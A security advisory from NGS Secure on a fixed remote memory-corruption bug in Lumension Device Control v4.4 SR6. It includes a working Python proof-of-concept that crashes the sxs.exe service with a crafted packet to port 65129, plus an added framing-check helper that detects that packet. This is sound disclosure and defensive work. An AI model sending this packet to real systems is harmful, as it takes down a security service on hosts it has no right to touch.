Lumension Device Control Memory Corruption
Posted on 26 August 2011

=======
Summary
=======
Name: Lumension Device Control (formerly Sanctuary) remote memory corruption
Release Date: 24 August 2011
Reference: NGS00054
Discoverer: Andy Davis <andy.davis@ngssecure.com>
Vendor: Lumension
Vendor Reference:
Systems Affected: Lumension Device Control v4.4 SR6
Risk: High
Status: Published

========
TimeLine
========
Discovered: 3 March 2011
Released: 3 March 2011
Approved: 3 March 2011
Reported: 3 March 2011
Fixed: 24 May 2011
Published: 24 August 2011

===========
Description
===========
By sending a specially crafted packet to TCP port 65129, the sxs.exe service running on the Lumension application server terminates.

=================
Technical Details
=================
A simple PoC is presented here:

#!/usr/local/bin/python
import sys
from socket import *
import os

if (len(sys.argv)!=2):
    print " --------------------------------------------------"
    print "Usage: %s <target IP>" % sys.argv[0]
    print "-------------------------------------------------- "
    exit(0)

host=sys.argv[1]
port=65129

packet1 = "\xec\x02\x00\x00" #length of remaining packet
packet1 += "\xc9\x00\x00\x00" #some kind of packet ID?
#packet1 += "\x18\x00\x00\x00"
packet1 += "\x61\x61\x61\x61" #crash occurs here
packet1 += "\xc8\x02\x00\x00\xd4\xf8\x27\xe3\x51\xdf\xc9\x48\x82\xc3"
packet1 += "\xdb\x73\xbf\x42\xce\x77\xec\x00\x00\x00\x00\x00\x00\x00\x01\x00"
packet1 += "\x00\x00\x0d\xd8\x91\x32\x61\xf4\x43\xa1\xe1\x8e\x27\x68\x6d\xde"
packet1 += "\xbe\x1d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x95\x00\x05\x01"
packet1 += "\x03\x00\x00\x03\x01\x10\x02\x00\x00\x00\x00\x00\x00\x00"
packet1 += "\x34\x2e\x34\x2e\x31\x34\x35\x32" #client version
packet1 += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
packet1 += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd6\x5e"
packet1 += "\xe0\x81\xdb\xd8\xcb\x01\xe4\x95\x45\xe1\xdb\xd8\xcb\x01\x7c\x99"
packet1 += "\x47\xbc\xdb\xd8\xcb\x01\xd6\xbc\xb0\x34\xdc\xd8\xcb\x01\x02\x00"
packet1 += "\x00\x00\x9c\x47\x57\x00\xd4\xf8\x27\xe3\x51\xdf\xc9\x48\x82\xc3"
packet1 += "\xdb\x73\xbf\x42\xce\x77\xec\x00\x00\x00\x00\x00\x00\x00\x00\x00"
packet1 += "\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"
packet1 += "\xc0\xa8\x00\x6b" #client IP address
packet1 += "\xff\xff\xff\x00" #client subnet mask
packet1 += "\x61\x00\x63\x00\x65\x00\x72\x00\x2d\x00\x65\x00\x38\x00"
packet1 += "\x31\x00\x37\x00\x66\x00\x61\x00\x65\x00\x30\x00\x64\x00\x38\x00" # client hostname
packet1 += "\x00" * 480
packet1 += "\x00\x00\x40\xfc\xba\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80"
packet1 += "\x85\xcc\x23\x00\x00\x00\x80\xee\x36\x00\x93\x84\xde\x84\x02\x00"
packet1 += "\x00\x00\x00\x00\x00\x00"

s = socket(AF_INET, SOCK_STREAM)
s.connect((host, port))
s.send(packet1)
print s.recv(1024)
s.close()

===============
Fix Information
===============
This issue is addressed in SR7, which can be downloaded by registered customers at:
https://portal.lumension.com/

NGS Secure Research
http://www.ngssecure.com
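As an added illustration for the Technical Details section (not part of the original advisory and not vendor code), the following Python 3 helper sanity-checks the framing of a message to TCP port 65129 using only the layout the PoC's comments give: a 4-byte little-endian length of the remaining packet, a 4-byte packet ID, and the dword at offset 8 that the PoC overwrites with "aaaa" (the advisory's commented-out original value is 0x18). Treating that third field as an in-message size or offset is an assumption, and both sample messages are constructed.

```python
import struct

SXS_PORT = 65129  # listener of the sxs.exe service named in the advisory

# Constructed samples (not captures): a benign-looking message that keeps the
# PoC's commented-out value 0x18 at offset 8, and the PoC's 12-byte header
# followed by zero padding so its length field (0x2ec = 748) stays self-consistent.
BENIGN_SAMPLE = struct.pack("<III", 748, 0xC9, 0x18) + b"\x00" * 740
POC_HEADER_SAMPLE = b"\xec\x02\x00\x00" + b"\xc9\x00\x00\x00" + b"aaaa" + b"\x00" * 740


def inspect_sxs_message(data: bytes) -> list:
    """Return a list of framing problems for one message; an empty list means it looks sane.

    Layout taken from the PoC's comments (an assumption, not vendor documentation):
      offset 0  uint32 LE  length of the remaining packet
      offset 4  uint32 LE  packet ID
      offset 8  uint32 LE  field the PoC replaces with 0x61616161 to trigger the crash
    """
    findings = []
    if len(data) < 12:
        return ["truncated header: %d bytes" % len(data)]
    declared_len, packet_id, field8 = struct.unpack_from("<III", data, 0)
    remaining = len(data) - 4
    if declared_len != remaining:
        findings.append("length field says %d but %d bytes follow" % (declared_len, remaining))
    # Assumption: the dword at offset 8 is an in-message size or offset, so a value
    # larger than the message itself (as in the PoC) cannot be legitimate.
    if field8 > remaining:
        findings.append("dword at offset 8 is 0x%08x, larger than the %d remaining bytes (packet ID 0x%x)"
                        % (field8, remaining, packet_id))
    return findings


if __name__ == "__main__":
    for name, sample in (("benign", BENIGN_SAMPLE), ("poc", POC_HEADER_SAMPLE)):
        print(name, inspect_sxs_message(sample) or "framing looks sane")
```

The check is meant to run over reassembled TCP payloads destined for SXS_PORT; it flags the PoC by its oversized third dword while leaving the self-consistent length field alone.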
